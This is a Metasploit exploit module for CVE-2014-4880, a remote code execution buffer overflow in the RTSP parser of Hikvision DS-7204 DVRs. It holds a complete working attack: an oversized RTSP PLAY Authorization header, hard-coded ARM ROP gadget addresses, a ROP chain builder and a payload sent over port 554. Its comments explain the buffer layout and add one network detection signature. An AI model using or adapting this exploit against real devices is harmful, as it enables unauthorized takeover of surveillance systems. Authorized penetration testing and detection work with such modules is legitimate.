##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
# Metasploit core library: provides Msf::Exploit::Remote, the Tcp mixin,
# update_info, Opt and the other framework names referenced below.
require 'msf/core'
class Metasploit4 < Msf::Exploit::Remote
  # Exploit module for CVE-2014-4880: a buffer overflow in the RTSP request
  # parser of Hikvision DVR appliances. Only one firmware build is supported
  # (see 'Targets'); any other model/firmware needs its own gadget set.
  Rank = NormalRanking

  # Raw TCP transport: exploit() builds the RTSP request by hand and writes it
  # with a single sock.put; no RTSP client library is involved.
  include Exploit::Remote::Tcp

  # Registers module metadata and the one option this module adds on top of
  # the Tcp mixin (RPORT, defaulting to 554, the RTSP port).
  #
  # @param info [Hash] metadata supplied by the framework, merged via update_info
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Hikvision DVR RTSP Request Remote Code Execution',
      'Description'    => %q{
        This module exploits a buffer overflow in the RTSP request parsing
        code of Hikvision DVR appliances. The Hikvision DVR devices record
        video feeds of surveillance cameras and offer remote administration
        and playback of recorded footage. The vulnerability is present in
        several models / firmware versions but due to the available test
        device this module only supports the DS-7204 model.
      },
      'Author'         =>
        [
          'Mark Schloesser <mark_schloesser[at]rapid7.com>', # @repmovsb, vulnerability analysis & exploit dev
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'CVE', '2014-4880' ],
        ],
      'Platform'       => 'linux',
      'Arch'           => ARCH_ARMLE,
      'Privileged'     => true,
      'Targets'        =>
        [
          #
          # ROP targets are difficult to represent in the hash, use callbacks instead
          #
          # Each target names a method (:callback) that returns the ROP chain for
          # that firmware build; the 'g_*' entries are the gadget addresses that
          # method and exploit() read back through target[].
          # NOTE: :callback is a Symbol key while the gadget entries use String
          # keys -- every lookup below uses the matching type; keep it that way.
          [ "DS-7204 Firmware V2.2.10 build 131009", {
            # The callback handles all target-specific settings
            :callback => :target_ds7204_1,
            'g_adjustesp' => 0x002c828c,
            # ADD SP, SP, #0x350
            # LDMFD SP!, {R4-R6,PC}
            'g_r3fromsp' => 0x00446f80,
            # ADD R3, SP, #0x60+var_58
            # BLX R6
            'g_blxr3_pop' => 0x00456360,
            # BLX R3
            # LDMFD SP!, {R1-R7,PC}
            'g_popr3' => 0x0000fe98,
            # LDMFD SP!, {R3,PC}
          } ],
          # No gadgets here: target_debug returns a cyclic pattern for crash triage.
          [ "Debug Target", {
            # The callback handles all target-specific settings
            :callback => :target_debug
          } ]
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Nov 19 2014'
    ))

    register_options(
      [
        Opt::RPORT(554)
      ], self.class)
  end

  # Builds one RTSP PLAY request and sends it to RHOST:RPORT.
  #
  # Layout of the buffer, in order:
  #   1. "PLAY rtsp://<rhost>/ RTSP/1.0", a CSeq header, and an
  #      "Authorization: Basic " header whose value is 0x280 + 34 random
  #      alphabetic bytes followed by the low three bytes of g_adjustesp
  #      (pack("V") is 32-bit little-endian; [0..2] drops the high byte).
  #   2. The "\r\n\r\n" header terminator.
  #   3. 19 random bytes, the target-specific ROP chain, 8 random bytes and
  #      the encoded payload.
  # The buffer is written once with sock.put and nothing is read back, so this
  # module cannot tell from the socket whether the overflow triggered.
  #
  # Detection note: a PLAY request carrying an Authorization header several
  # hundred bytes long, followed by non-text data after the header block, is a
  # usable network signature for this traffic.
  #
  # Calls fail_with(Failure::NoTarget) when the selected target names a
  # callback this module does not define.
  def exploit
    # Targets carry a Symbol naming the method that produces their ROP chain.
    unless self.respond_to?(target[:callback])
      fail_with(Failure::NoTarget, "Invalid target specified: no callback function defined")
    end

    # Target-specific ROP chain (or the debug pattern), built by the callback.
    device_rop = self.send(target[:callback])

    request = "PLAY rtsp://#{rhost}/ RTSP/1.0\r\n"
    request << "CSeq: 7\r\n"
    request << "Authorization: Basic "
    # Fixed-length filler, then the SP-adjust gadget address (see 'Targets').
    request << rand_text_alpha(0x280 + 34)
    request << [target["g_adjustesp"]].pack("V")[0..2]
    request << "\r\n\r\n"
    request << rand_text_alpha(19)
    # now append the ropchain
    request << device_rop
    request << rand_text_alpha(8)
    request << payload.encoded

    connect
    sock.put(request)
    disconnect
  end

  # These devices are armle, run version 1.3.1 of libupnp, have random stacks, but no PIE on libc
  #
  # Returns the 24-byte ROP chain for the DS-7204 target. The chain is six
  # 32-bit slots; only slots 2, 3 and 5 (byte offsets 8, 12, 20) hold gadget
  # addresses. The other slots stay random filler for the registers the CHAIN
  # sketch below marks as don't-care (R4, R5, R3).
  #
  # @return [String] 24 bytes, gadget addresses packed little-endian
  def target_ds7204_1
    # Create a fixed-size buffer for the rop chain
    ropbuf = rand_text_alpha(24)
    # CHAIN = [
    #   0, #R4 pop adjustsp
    #   0, #R5 pop adjustsp
    #   GADGET_BLXR3_POP, #R6 pop adjustsp
    #   GADGET_POPR3,
    #   0, #R3 pop
    #   GADGET_R3FROMSP,
    # ]
    # Slot 2 -> R6 (popped by g_adjustesp's LDMFD), slot 3 -> PC, slot 5 -> g_r3fromsp.
    ropbuf[8, 4] = [target["g_blxr3_pop"]].pack("V")
    ropbuf[12, 4] = [target["g_popr3"]].pack("V")
    ropbuf[20, 4] = [target["g_r3fromsp"]].pack("V")
    return ropbuf
  end

  # Generate a buffer that provides a starting point for exploit development
  #
  # Used by the "Debug Target": returns a 2000-byte Rex cyclic pattern in place
  # of a ROP chain so the crash offset can be recovered from the pattern.
  def target_debug
    Rex::Text.pattern_create(2000)
  end

  # RHOST as set in the datastore; interpolated into the RTSP request line.
  # NOTE(review): Exploit::Remote::Tcp already provides rhost/rport readers, so
  # these two overrides look redundant -- confirm before removing them.
  def rhost
    datastore['RHOST']
  end

  # RPORT as set in the datastore (default 554, registered in initialize).
  def rport
    datastore['RPORT']
  end
end